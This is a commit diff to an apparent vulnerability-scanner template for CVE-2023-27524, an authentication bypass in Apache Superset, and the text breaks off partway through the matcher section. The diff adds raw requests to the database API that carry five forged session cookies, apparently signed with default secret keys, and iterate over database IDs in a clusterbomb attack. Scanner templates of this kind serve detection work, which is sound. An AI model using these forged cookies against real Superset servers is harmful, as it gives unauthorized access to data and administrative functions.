Updated CVE-2023-27524 Template

2023-04-26 17:03:59 +08:00 · 2023-04-26 17:03:59 +08:00 · 16de23e95f
parent 1b6d1521f6
commit 16de23e95f
1 changed files with 23 additions and 7 deletions
--- a/cves/2023/CVE-2023-27524.yaml
+++ b/cves/2023/CVE-2023-27524.yaml
@ -2,11 +2,12 @@ id: CVE-2023-27524

 info:
  name: Apache Superset - Authentication Bypass
-  author: DhiyaneshDK
+  author: DhiyaneshDK,_0xf4n9x_
  severity: high
  description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.
  reference:
    - https://github.com/horizon3ai/CVE-2023-27524
+    - https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27524
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
@ -21,15 +22,30 @@ info:
 requests:
  - raw:
      - |
-        GET /login/ HTTP/1.1
+        GET /api/v1/database/{{path}} HTTP/1.1
        Host: {{Hostname}}
-        Accept: */*
+        Cookie: session={{session}}

-      - |
-        GET /api/v1/database/1 HTTP/1.1
-        Host: {{Hostname}}
-        Cookie: session=eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEfQPg.Enz83rUqMAFfdCds7ClQzlEmScg
+    payloads:
+      path: 
+        - '1'
+        - '2'
+        - '3'
+        - '4'
+        - '5'
+        - '6'
+        - '7'
+        - '9'
+        - '10'
+      session: 
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.RoFeMf1WLNJXDYslf18x9VGxC0Q'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hKV8XXVcD6lWhTIoWs0CjrSRPQQ'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.xtJXBhmJ0k6_oKs8iGhWJK2BjKs'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hRZP41FgqxjaxjJ3WyeIVxyZDng'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.6GpaUB9IP9OnG3HHon3XcdzHWhI'
+    attack: clusterbomb

+    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word